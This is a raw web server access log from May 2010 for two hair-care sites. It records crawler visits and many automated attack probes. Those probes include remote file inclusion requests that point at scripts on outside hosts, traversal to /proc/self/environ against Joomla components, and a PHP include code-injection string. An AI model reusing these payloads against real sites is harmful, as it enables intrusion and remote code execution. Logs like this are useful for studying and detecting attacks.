213.189.224.16 - - [24/May/2010:13:15:51 -0700] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.thatvilla.com/occupants/New%20Folder/2?? HTTP/1.1" 404 - "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "growlonghairfast.com"
77.88.25.28 - - [24/May/2010:13:18:39 -0700] "GET /freehairsecretsphp/viewtopic.php?p=14357 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
77.88.25.28 - - [24/May/2010:13:18:46 -0700] "GET /logs/access_100201.log HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
79.116.99.34 - - [24/May/2010:13:19:28 -0700] "GET /logs/access_100503.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
79.116.99.34 - - [24/May/2010:13:19:28 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
79.116.99.34 - - [24/May/2010:13:19:28 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
77.88.25.28 - - [24/May/2010:13:25:42 -0700] "GET /freehairsecretsphp/viewtopic.php?p=15355 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
66.230.221.15 - - [24/May/2010:13:26:00 -0700] "GET /logs/access_100503.log//index.php?option=com_extcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.230.221.15 - - [24/May/2010:13:26:00 -0700] "GET /logs/access_100503.log//index.php?option=com_extcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
66.230.221.15 - - [24/May/2010:13:26:00 -0700] "GET /logs/access_100503.log//index.php?option=com_extcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 - "-" "" "growlonghairfast.com"
66.230.221.15 - - [24/May/2010:13:26:00 -0700] "GET /logs/access_100503.log//index.php?option=com_extcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "" "growlonghairfast.com"
79.116.99.34 - - [24/May/2010:13:26:01 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
79.116.99.34 - - [24/May/2010:13:26:01 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
79.116.99.34 - - [24/May/2010:13:26:01 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
95.108.142.138 - - [24/May/2010:13:26:12 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.freehairsecrets.com"
95.108.142.138 - - [24/May/2010:13:26:13 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; H)" "freehairsecrets.com"
95.108.142.138 - - [24/May/2010:13:26:14 -0700] "GET / HTTP/1.1" 200 926 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.freehairsecrets.com"
95.108.142.138 - - [24/May/2010:13:26:15 -0700] "GET / HTTP/1.1" 200 926 "-" "Yandex/1.01.001 (compatible; Win16; H)" "freehairsecrets.com"
95.108.142.138 - - [24/May/2010:13:26:16 -0700] "GET / HTTP/1.1" 200 926 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.freehairsecrets.com"
95.108.142.138 - - [24/May/2010:13:26:17 -0700] "GET / HTTP/1.1" 200 926 "-" "Yandex/1.01.001 (compatible; Win16; H)" "freehairsecrets.com"
77.88.25.28 - - [24/May/2010:13:29:08 -0700] "GET /logs/access_100503.log HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
87.250.77.10 - - [24/May/2010:13:31:02 -0700] "GET /logs/scripts.log//mt-comments.cgi?id=http://www.revenantdesign.com/images//id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
87.250.77.10 - - [24/May/2010:13:31:02 -0700] "GET /mt-comments.cgi?id=http://www.revenantdesign.com/images//id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
87.250.77.10 - - [24/May/2010:13:31:02 -0700] "GET /logs//mt-comments.cgi?id=http://www.revenantdesign.com/images//id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
77.222.56.62 - - [24/May/2010:13:31:11 -0700] "GET /logs/scripts.log/mt-comments.cgi?id=http://pkill.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
77.222.56.62 - - [24/May/2010:13:31:11 -0700] "GET /mt-comments.cgi?id=http://pkill.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
77.222.56.62 - - [24/May/2010:13:31:12 -0700] "GET /logs//mt-comments.cgi?id=http://pkill.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
87.250.77.10 - - [24/May/2010:13:32:08 -0700] "GET /mt-comments.cgi?id=http://www.revenantdesign.com/images//id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
77.88.25.28 - - [24/May/2010:13:32:44 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13704 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
220.73.161.132 - - [24/May/2010:13:35:44 -0700] "GET /logs/access_100315.log%20%20//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://reconer.110mb.com/z1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
220.73.161.132 - - [24/May/2010:13:35:44 -0700] "GET /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://reconer.110mb.com/z1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
220.73.161.132 - - [24/May/2010:13:35:44 -0700] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://reconer.110mb.com/z1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.230.221.15 - - [24/May/2010:13:39:25 -0700] "GET /logs/access_100426.log//index.php?option=com_extcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.230.221.15 - - [24/May/2010:13:39:25 -0700] "GET /logs/access_100426.log//index.php?option=com_extcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
66.230.221.15 - - [24/May/2010:13:39:25 -0700] "GET /logs/access_100426.log//index.php?option=com_extcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 - "-" "" "growlonghairfast.com"
66.230.221.15 - - [24/May/2010:13:39:25 -0700] "GET /logs/access_100426.log//index.php?option=com_extcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "" "growlonghairfast.com"
77.88.25.28 - - [24/May/2010:13:41:49 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13476 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
77.88.25.28 - - [24/May/2010:13:42:23 -0700] "GET /freehairsecretsphp/viewtopic.php?p=5579 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
66.230.221.15 - - [24/May/2010:13:44:50 -0700] "GET /index.php?option=com_extcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.230.221.15 - - [24/May/2010:13:44:50 -0700] "GET /index.php?option=com_extcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
66.230.221.15 - - [24/May/2010:13:44:51 -0700] "GET /index.php?option=com_extcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 - "-" "" "growlonghairfast.com"
66.230.221.15 - - [24/May/2010:13:44:51 -0700] "GET /index.php?option=com_extcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "" "growlonghairfast.com"
66.230.221.15 - - [24/May/2010:13:44:53 -0700] "GET /logs//index.php?option=com_extcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.230.221.15 - - [24/May/2010:13:44:53 -0700] "GET /logs//index.php?option=com_extcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
66.230.221.15 - - [24/May/2010:13:44:53 -0700] "GET /logs//index.php?option=com_extcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 - "-" "" "growlonghairfast.com"
66.230.221.15 - - [24/May/2010:13:44:53 -0700] "GET /logs//index.php?option=com_extcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "" "growlonghairfast.com"
66.230.221.15 - - [24/May/2010:13:44:55 -0700] "GET /logs/access_100503.log%20%20//index.php?option=com_extcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.230.221.15 - - [24/May/2010:13:44:55 -0700] "GET /logs/access_100503.log%20%20//index.php?option=com_extcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
66.230.221.15 - - [24/May/2010:13:44:55 -0700] "GET /logs/access_100503.log%20%20//index.php?option=com_extcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 - "-" "" "growlonghairfast.com"
66.230.221.15 - - [24/May/2010:13:44:56 -0700] "GET /logs/access_100503.log%20%20//index.php?option=com_extcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "" "growlonghairfast.com"
87.250.77.10 - - [24/May/2010:13:45:20 -0700] "GET /logs//mt-comments.cgi?id=http://www.revenantdesign.com/images//id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.growlonghairfast.com"
87.250.77.10 - - [24/May/2010:13:45:20 -0700] "GET /mt-comments.cgi?id=http://www.revenantdesign.com/images//id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.growlonghairfast.com"
81.80.122.44 - - [24/May/2010:13:46:23 -0700] "GET /logs/scripts.log//errors.php?error=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
81.80.122.44 - - [24/May/2010:13:46:23 -0700] "GET /errors.php?error=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
81.80.122.44 - - [24/May/2010:13:46:23 -0700] "GET /logs//errors.php?error=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
79.116.99.34 - - [24/May/2010:13:46:30 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
81.80.122.44 - - [24/May/2010:13:46:36 -0700] "GET /errors.php?error=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
81.80.122.44 - - [24/May/2010:13:46:40 -0700] "GET /errors.php?error=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
81.80.122.44 - - [24/May/2010:13:48:22 -0700] "GET /errors.php?error=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
81.80.122.44 - - [24/May/2010:13:48:29 -0700] "GET /errors.php?error=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
81.80.122.44 - - [24/May/2010:13:48:30 -0700] "GET /logs/scripts.log//errors.php?error=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
81.80.122.44 - - [24/May/2010:13:48:31 -0700] "GET /errors.php?error=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
81.80.122.44 - - [24/May/2010:13:48:31 -0700] "GET /logs//errors.php?error=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
81.80.122.44 - - [24/May/2010:13:48:52 -0700] "GET /errors.php?error=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
213.189.224.16 - - [24/May/2010:13:48:58 -0700] "GET /comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.thatvilla.com/occupants/New%20Folder/2?? HTTP/1.1" 404 - "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "growlonghairfast.com"
213.189.224.16 - - [24/May/2010:13:48:58 -0700] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.thatvilla.com/occupants/New%20Folder/2?? HTTP/1.1" 404 - "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "growlonghairfast.com"
79.116.99.34 - - [24/May/2010:13:50:27 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
77.88.25.28 - - [24/May/2010:13:51:02 -0700] "GET /freehairsecretsphp/viewtopic.php?p=12885 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
79.116.99.34 - - [24/May/2010:13:51:49 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
81.80.122.44 - - [24/May/2010:13:51:53 -0700] "GET /logs/scripts.log//errors.php?error=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
81.80.122.44 - - [24/May/2010:13:51:53 -0700] "GET /errors.php?error=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
81.80.122.44 - - [24/May/2010:13:51:53 -0700] "GET /logs//errors.php?error=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
79.116.99.34 - - [24/May/2010:13:52:49 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
77.88.25.28 - - [24/May/2010:13:53:27 -0700] "GET /freehairsecretsphp/viewtopic.php?p=4921 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
79.116.99.34 - - [24/May/2010:13:55:45 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
79.116.99.34 - - [24/May/2010:13:57:20 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
79.116.99.34 - - [24/May/2010:13:58:15 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
79.116.99.34 - - [24/May/2010:13:58:16 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
79.116.99.34 - - [24/May/2010:13:58:16 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
79.116.99.34 - - [24/May/2010:13:59:28 -0700] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
79.116.99.34 - - [24/May/2010:14:00:14 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
79.116.99.34 - - [24/May/2010:14:00:14 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
79.116.99.34 - - [24/May/2010:14:00:14 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
81.80.122.44 - - [24/May/2010:14:00:51 -0700] "GET /logs//errors.php?error=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.growlonghairfast.com"
81.80.122.44 - - [24/May/2010:14:00:51 -0700] "GET /errors.php?error=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.growlonghairfast.com"
79.116.99.34 - - [24/May/2010:14:01:41 -0700] "GET /logs/access_100503.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
79.116.99.34 - - [24/May/2010:14:01:42 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
79.116.99.34 - - [24/May/2010:14:01:42 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
79.116.99.34 - - [24/May/2010:14:01:49 -0700] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
79.116.99.34 - - [24/May/2010:14:02:19 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
79.116.99.34 - - [24/May/2010:14:02:20 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
79.116.99.34 - - [24/May/2010:14:02:20 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
77.88.25.28 - - [24/May/2010:14:05:04 -0700] "GET /freehairsecretsphp/viewtopic.php?p=15237 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
79.116.99.34 - - [24/May/2010:14:05:23 -0700] "GET /logs/access_100510.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
79.116.99.34 - - [24/May/2010:14:05:23 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
79.116.99.34 - - [24/May/2010:14:05:23 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
79.116.99.34 - - [24/May/2010:14:08:45 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
79.116.99.34 - - [24/May/2010:14:08:45 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
79.116.99.34 - - [24/May/2010:14:08:45 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
77.88.25.28 - - [24/May/2010:14:12:30 -0700] "GET /freehairsecretsphp/viewtopic.php?p=6205 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
79.116.99.34 - - [24/May/2010:14:12:42 -0700] "GET /logs/access_100510.log//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
79.116.99.34 - - [24/May/2010:14:12:43 -0700] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
79.116.99.34 - - [24/May/2010:14:12:43 -0700] "GET /logs//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
66.230.221.15 - - [24/May/2010:14:19:09 -0700] "GET /logs/access_100426.log%20%20//index.php?option=com_extcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.230.221.15 - - [24/May/2010:14:19:10 -0700] "GET /logs/access_100426.log%20%20//index.php?option=com_extcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
66.230.221.15 - - [24/May/2010:14:19:10 -0700] "GET /logs/access_100426.log%20%20//index.php?option=com_extcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 - "-" "" "growlonghairfast.com"
66.230.221.15 - - [24/May/2010:14:19:10 -0700] "GET /logs/access_100426.log%20%20//index.php?option=com_extcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "" "growlonghairfast.com"
77.88.25.28 - - [24/May/2010:14:19:33 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
213.189.224.16 - - [24/May/2010:14:21:32 -0700] "GET /comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.thatvilla.com/occupants/New%20Folder/2?? HTTP/1.1" 404 - "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "growlonghairfast.com"
213.189.224.16 - - [24/May/2010:14:21:32 -0700] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.thatvilla.com/occupants/New%20Folder/2?? HTTP/1.1" 404 - "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "growlonghairfast.com"
67.195.114.238 - - [24/May/2010:14:21:51 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.freehairsecrets.com"
67.195.114.238 - - [24/May/2010:14:21:52 -0700] "GET /logs/access_091207.log HTTP/1.0" 200 748461 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.freehairsecrets.com"
213.5.70.66 - - [24/May/2010:14:22:02 -0700] "GET /logs/access_090810.log HTTP/1.0" 404 - "http://pink-viagra.co.cc/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "growlonghairfast.com"
77.88.25.28 - - [24/May/2010:14:26:31 -0700] "GET /freehairsecretsphp/viewtopic.php?p=5552 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
77.88.25.28 - - [24/May/2010:14:28:37 -0700] "GET /freehairsecretsphp/viewtopic.php?p=18881 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
